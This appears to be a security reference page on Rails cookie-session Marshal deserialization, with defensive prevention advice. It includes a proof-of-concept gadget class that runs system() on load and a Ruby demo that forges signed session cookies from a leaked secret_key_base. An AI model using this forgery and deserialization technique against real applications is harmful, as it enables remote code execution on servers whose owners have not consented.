Rails Session Serialization

Rails session serialization vulnerabilities occur when session data carried in the cookie store is deserialized with Marshal. The cookie is signed (and, since Rails 5.2, encrypted) with keys derived from secret_key_base, so anyone who knows that secret can mint a cookie the application will trust; if the application then runs Marshal.load on it, arbitrary Ruby objects are instantiated, which typically ends in remote code execution.

Session Serialization Options

# Rails cookie serializers (config.action_dispatch.cookies_serializer)
:json      # Safe - only strings, numbers, booleans, arrays and hashes come back; no object instantiation
:marshal   # Dangerous - Marshal.load builds arbitrary Ruby objects and runs their _load / marshal_load hooks
:hybrid    # Reads both, writes JSON (for migration) - still accepts forged Marshal cookies until you move to :json

Marshal Deserialization Attack

If an attacker knows the Rails secret_key_base, they can derive the same signing key (HMAC-SHA1 on Rails before 5.2) or encryption key (5.2 and later) the application uses, and so forge session cookies containing Marshal payloads that the application accepts as genuine. When the cookie serializer is :marshal or :hybrid, Marshal.load runs on the forged bytes and executes the _load / marshal_load hooks of whatever classes the payload names. Marshal can only instantiate classes that already exist in the target process, so real payloads chain "gadget" classes the application or its gems load rather than attacker-defined ones.

Exploitation Scenario

# Attacker creates a malicious session cookie
# using the known secret_key_base + a Marshal payload.
# Marshal.load only instantiates classes the target process already
# defines, so a real payload reuses a "gadget" class the app loads;
# this class stands in for such a gadget.
class Exploit
  def initialize(cmd)
    @cmd = cmd
  end

  def _dump(_level)          # what Marshal.dump emits for the object
    @cmd
  end

  def self._load(data)       # what Marshal.load calls on the server
    system(data)             # executes the attacker's command
  end
end

payload = Marshal.dump(Exploit.new("id"))   # signed with the known secret and sent as the cookie

# When Rails deserializes the cookie → Exploit._load("id") → RCE
Marshal.load(payload)
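To make the serializer comparison and the forgery scenario above concrete, here is an added example, not code from this page or from Rails itself. It models the pre-5.2 signed CookieStore with the Ruby standard library only: a signing key derived from secret_key_base with PBKDF2-HMAC-SHA1 (the iteration count, salt and key length are assumptions modelled on ActiveSupport::KeyGenerator defaults) and a "base64(payload)--hex(hmac)" envelope like ActiveSupport::MessageVerifier. The Gadget class, the leaked secret and the session contents are constructed for the demo; the gadget records the command it is handed instead of running it. The same forged cookie is then fed to an app using :marshal and to one using :json.

```ruby
require "openssl"
require "json"

# Constructed model of the pre-5.2 signed CookieStore (not Rails code).
SIGNED_COOKIE_SALT = "signed cookie"   # assumed default signed_cookie_salt
KEY_ITERATIONS = 1000                  # assumed KeyGenerator iteration count

def signing_key(secret_key_base)
  OpenSSL::KDF.pbkdf2_hmac(secret_key_base, salt: SIGNED_COOKIE_SALT,
                           iterations: KEY_ITERATIONS, length: 64, hash: "sha1")
end

def sign_cookie(key, serialized)
  data = [serialized].pack("m0")                      # strict base64, no newlines
  "#{data}--#{OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new("SHA1"), key, data)}"
end

def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Returns the serialized bytes when the HMAC verifies, nil otherwise.
def verify_cookie(key, cookie)
  data, digest = cookie.split("--", 2)
  return nil unless data && digest
  expected = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new("SHA1"), key, data)
  return nil unless constant_time_equal?(expected, digest)
  data.unpack1("m0")
end

# Stand-in gadget. Marshal.load only instantiates classes the target process
# already defines, so a real payload reuses classes the app loads; this one
# records what it was handed instead of calling system(data).
class Gadget
  class << self
    attr_accessor :last_command
  end

  def initialize(command)
    @command = command
  end

  def _dump(_level)            # what Marshal.dump writes for this object
    @command
  end

  def self._load(data)         # what Marshal.load calls on the server
    self.last_command = data   # a real gadget would do system(data)
    { "session_id" => "forged" }
  end
end

# App configured with :marshal - a verified cookie goes straight into Marshal.load.
def load_session_marshal(key, cookie)
  serialized = verify_cookie(key, cookie)
  serialized && Marshal.load(serialized)
end

# App configured with :json - the same bytes are rejected as malformed JSON, and
# valid JSON only ever yields strings, numbers, booleans, arrays and hashes.
def load_session_json(key, cookie)
  serialized = verify_cookie(key, cookie)
  return nil unless serialized
  JSON.parse(serialized)
rescue JSON::JSONError
  :rejected
end

def demo
  leaked_secret = "a" * 128                                # constructed leaked secret_key_base
  key = signing_key(leaked_secret)
  forged = sign_cookie(key, Marshal.dump(Gadget.new("id")))   # attacker-built cookie

  Gadget.last_command = nil
  marshal_result = load_session_marshal(key, forged)       # Gadget._load("id") runs here
  {
    marshal_result: marshal_result,
    gadget_ran_with: Gadget.last_command,                  # "id"
    json_result: load_session_json(key, forged),           # :rejected
    wrong_secret: load_session_marshal(signing_key("b" * 128), forged) # nil: HMAC mismatch
  }
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

Note that the HMAC is what stops an outsider, and it is only as secret as secret_key_base; once that leaks, the serializer is the last line of defence, and only :json refuses the payload. Rails 5.2 and later encrypt the cookie instead of merely signing it, but the encryption key is derived from the same secret, so the conclusion is unchanged.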

Vulnerable Configurations

  • Rails < 4.1, which had no cookies_serializer option and always used Marshal
  • Apps upgraded from those versions, which keep :marshal unless config/initializers/cookies_serializer.rb sets otherwise (:hybrid still loads Marshal cookies)
  • Cookie-based sessions (the default session store) with the Marshal serializer
  • Leaked or weak secret_key_base (or the older secret_token)
  • Secret committed to version control (config/secrets.yml, config/initializers/secret_token.rb)

Prevention

# config/initializers/cookies_serializer.rb (generated for new apps since Rails 4.1)
Rails.application.config.action_dispatch.cookies_serializer = :json
# Use :hybrid only for the migration window, then switch to :json; :hybrid still
# deserializes Marshal cookies, so the forgery path stays open until you do.

# Ensure secret_key_base is:
# - Strong: generated with `bin/rails secret` (128 random hex characters)
# - Not in version control: keep it in encrypted credentials
#   (config/credentials.yml.enc, unlocked by RAILS_MASTER_KEY) or in the
#   SECRET_KEY_BASE environment variable
# - Different per environment
# - Rotated if it ever leaks (rotation invalidates every outstanding session)

See Also